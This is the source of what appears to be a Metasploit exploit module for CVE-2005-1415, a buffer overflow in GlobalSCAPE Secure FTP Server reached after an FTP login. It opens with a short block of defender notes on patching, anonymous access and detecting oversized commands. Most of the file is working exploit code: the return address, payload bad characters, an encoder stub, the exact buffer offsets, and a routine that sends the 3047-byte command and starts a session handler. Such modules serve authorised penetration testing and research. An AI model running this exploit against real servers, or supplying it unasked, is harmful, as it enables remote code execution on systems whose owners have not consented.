Path: blob/master/modules/exploits/windows/ftp/globalscapeftp_input.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2005-1415, a buffer overflow in the GlobalSCAPE
# Secure FTP Server that is reached after an FTP login.
#
# Defender notes, taken from the module's own metadata and request layout:
# * Versions prior to 3.0.3 are listed as affected, so hosts still on 3.0.2
#   or older are the ones to inventory and upgrade.
# * A valid account or anonymous access is required, so disabling anonymous
#   FTP and auditing FTP credentials narrows who can reach the flaw.
# * The request is a single FTP command of 3047 bytes; a command-length limit
#   or an IDS rule on oversized FTP command lines would flag it.
# * Reliability, stability and side effects are all declared UNKNOWN, so the
#   effect on the service has not been assessed in this file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Ftp

  # Registers the module metadata (name, references, payload constraints,
  # the single target and its 'Ret' value) with the framework.
  #
  # info - Hash of caller-supplied overrides merged in by update_info.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'GlobalSCAPE Secure FTP Server Input Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.
          All versions prior to 3.0.3 are affected by this flaw. A valid user account (
          or anonymous access) is required for this exploit to work.
        },
        'Author' => [
          'Fairuzan Roslan <riaf[at]mysec.org>',
          'Mati Aharoni <mati[at]see-security.com>'
        ],
        'License' => BSD_LICENSE,
        'References' => [
          ['CVE', '2005-1415'],
          ['OSVDB', '16049'],
          ['BID', '13454'],
          ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],
        ],
        'Privileged' => false,
        'Payload' => {
          'Space' => 1000,
          # NUL, space and lowercase ASCII a-z are excluded from the payload.
          'BadChars' => "\x00\x20" + (0x61..0x7a).to_a.pack('C*'),
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
        },
        'Platform' => ['win'],
        'Targets' => [
          [
            'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',
            { 'Ret' => 0x1002f01f },
          ],
        ],
        'DisclosureDate' => '2005-05-01',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Logs in over FTP, sends one oversized command and hands control to the
  # framework's session handler. Returns early when the login fails.
  def exploit
    session = connect_login
    return unless session

    # 3047-byte request: filler, the target's 'Ret' value as a 32-bit
    # little-endian word at offset 2043, then the encoded payload at 2047.
    request = make_nops(3047)
    ret_word = [target.ret].pack('V')
    request[2043, 4] = ret_word
    request[2047, payload.encoded.length] = payload.encoded

    # The whole buffer is passed as the only element of the command array.
    send_cmd([request])

    handler
    disconnect
  end
end